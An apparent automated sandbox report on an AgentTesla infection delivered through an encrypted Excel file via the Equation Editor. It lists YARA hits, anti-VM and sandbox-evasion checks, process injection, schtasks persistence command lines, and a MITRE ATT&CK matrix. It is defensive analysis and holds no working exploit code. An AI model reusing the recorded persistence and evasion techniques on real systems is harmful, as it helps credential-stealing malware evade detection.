                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: Doc2.xlsxStream path 'EncryptedPackage' entropy: 7.99880681599 (max. 8.0)

                      Malware Analysis System Evasion:

                      barindex
                      Yara detected AntiVM3Show sources
                      Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2964, type: MEMORY
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                      Source: vbc.exe, 00000006.00000002.2229803981.0000000002311000.00000004.00000001.sdmp, MLdAu.exe, 0000000B.00000002.2335458220.0000000001FF1000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                      Source: vbc.exe, 00000006.00000002.2229803981.0000000002311000.00000004.00000001.sdmp, MLdAu.exe, 0000000B.00000002.2335458220.0000000001FF1000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\Public\vbc.exeWindow / User API: threadDelayed 9502
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeWindow / User API: threadDelayed 9500
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1952Thread sleep time: -360000s >= -30000s
                      Source: C:\Users\Public\vbc.exe TID: 1276Thread sleep time: -60000s >= -30000s
                      Source: C:\Users\Public\vbc.exe TID: 2408Thread sleep time: -60000s >= -30000s
                      Source: C:\Users\Public\vbc.exe TID: 1028Thread sleep time: -5534023222112862s >= -30000s
                      Source: C:\Users\Public\vbc.exe TID: 1028Thread sleep time: -150000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe TID: 1312Thread sleep time: -60000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe TID: 856Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe TID: 2480Thread sleep time: -60000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe TID: 2260Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe TID: 2156Thread sleep time: -360000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe TID: 1304Thread sleep time: -1844674407370954s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe TID: 1304Thread sleep time: -150000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe TID: 1272Thread sleep count: 9500 > 30
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe TID: 1272Thread sleep count: 245 > 30
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe TID: 1304Thread sleep count: 104 > 30
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeLast function: Thread delayed
                      Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\Public\vbc.exeThread delayed: delay time: 30000
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeThread delayed: delay time: 30000
                      Source: MLdAu.exe, 0000000B.00000002.2335458220.0000000001FF1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
                      Source: MLdAu.exe, 0000000B.00000002.2335458220.0000000001FF1000.00000004.00000001.sdmpBinary or memory string: vmware
                      Source: MLdAu.exe, 0000000B.00000002.2335458220.0000000001FF1000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: MLdAu.exe, 0000000B.00000002.2335458220.0000000001FF1000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                      Source: vbc.exe, 00000006.00000002.2233213372.0000000005223000.00000004.00000001.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                      Source: MLdAu.exe, 0000000B.00000002.2335458220.0000000001FF1000.00000004.00000001.sdmpBinary or memory string: VMWARE
                      Source: MLdAu.exe, 0000000B.00000002.2335458220.0000000001FF1000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: MLdAu.exe, 0000000B.00000002.2335458220.0000000001FF1000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                      Source: MLdAu.exe, 0000000B.00000002.2335458220.0000000001FF1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
                      Source: MLdAu.exe, 0000000B.00000002.2335458220.0000000001FF1000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
                      Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformation
                      Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess token adjusted: Debug
                      Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      Injects a PE file into a foreign processesShow sources
                      Source: C:\Users\Public\vbc.exeMemory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeMemory written: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeMemory written: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe base: 400000 value starts with: 4D5A
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
                      Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\WzyRXCWtdGSdEA' /XML 'C:\Users\user\AppData\Local\Temp\tmpB2BC.tmp'
                      Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe {path}
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\WzyRXCWtdGSdEA' /XML 'C:\Users\user\AppData\Local\Temp\tmp7511.tmp'
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess created: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe {path}
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\WzyRXCWtdGSdEA' /XML 'C:\Users\user\AppData\Local\Temp\tmp74F2.tmp'
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess created: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe {path}
                      Source: vbc.exe, 00000009.00000002.2370335356.0000000000CA0000.00000002.00000001.sdmpBinary or memory string: Program Manager
                      Source: vbc.exe, 00000009.00000002.2370335356.0000000000CA0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                      Source: vbc.exe, 00000009.00000002.2370335356.0000000000CA0000.00000002.00000001.sdmpBinary or memory string: !Progman
                      Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformation
                      Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformation
                      Source: C:\Users\Public\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeQueries volume information: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeQueries volume information: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeQueries volume information: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeQueries volume information: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe VolumeInformation
                      Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Users\Public\vbc.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 BlobJump to behavior

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 12.2.MLdAu.exe.328e310.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.MLdAu.exe.30ee310.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.vbc.exe.340e310.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.MLdAu.exe.30ee310.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.MLdAu.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.MLdAu.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.vbc.exe.340e310.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.MLdAu.exe.328e310.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000012.00000002.2336318504.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2341517856.0000000003191000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2369735651.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2369629595.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2342137023.0000000002FF1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2230917923.00000000034B9000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2230665557.0000000003311000.00000004.00000001.sdmp, type: MEMORY
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 12.2.MLdAu.exe.328e310.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.MLdAu.exe.30ee310.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.vbc.exe.340e310.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.MLdAu.exe.30ee310.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.MLdAu.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.MLdAu.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.vbc.exe.340e310.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.MLdAu.exe.328e310.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000012.00000002.2336318504.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2341517856.0000000003191000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2370417505.0000000002251000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2369735651.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2369629595.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2370313444.0000000001FD1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2342137023.0000000002FF1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2338492595.0000000002261000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2230917923.00000000034B9000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2230665557.0000000003311000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2148, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2964, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2370417505.0000000002251000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2370313444.0000000001FD1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2338492595.0000000002261000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2148, type: MEMORY

                      Remote Access Functionality:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 12.2.MLdAu.exe.328e310.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.MLdAu.exe.30ee310.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.vbc.exe.340e310.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.MLdAu.exe.30ee310.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.MLdAu.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.MLdAu.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.vbc.exe.340e310.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.MLdAu.exe.328e310.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000012.00000002.2336318504.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2341517856.0000000003191000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2369735651.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2369629595.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2342137023.0000000002FF1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2230917923.00000000034B9000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2230665557.0000000003311000.00000004.00000001.sdmp, type: MEMORY
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 12.2.MLdAu.exe.328e310.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.MLdAu.exe.30ee310.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.vbc.exe.340e310.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.MLdAu.exe.30ee310.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.MLdAu.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.MLdAu.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.vbc.exe.340e310.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.MLdAu.exe.328e310.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000012.00000002.2336318504.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2341517856.0000000003191000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2370417505.0000000002251000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2369735651.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2369629595.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2370313444.0000000001FD1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2342137023.0000000002FF1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2338492595.0000000002261000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2230917923.00000000034B9000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2230665557.0000000003311000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2148, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2964, type: MEMORY

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation211Scheduled Task/Job1Extra Window Memory Injection1Disable or Modify Tools11OS Credential DumpingFile and Directory Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsExploitation for Client Execution13Registry Run Keys / Startup Folder1Process Injection112Obfuscated Files or Information21LSASS MemorySystem Information Discovery114Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsCommand and Scripting Interpreter1Logon Script (Windows)Scheduled Task/Job1Software Packing12Security Account ManagerQuery Registry1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsScheduled Task/Job1Logon Script (Mac)Registry Run Keys / Startup Folder1Extra Window Memory Injection1NTDSSecurity Software Discovery311Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading111LSA SecretsProcess Discovery2SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol22Manipulate Device CommunicationManipulate App Store Rankings or Ratings
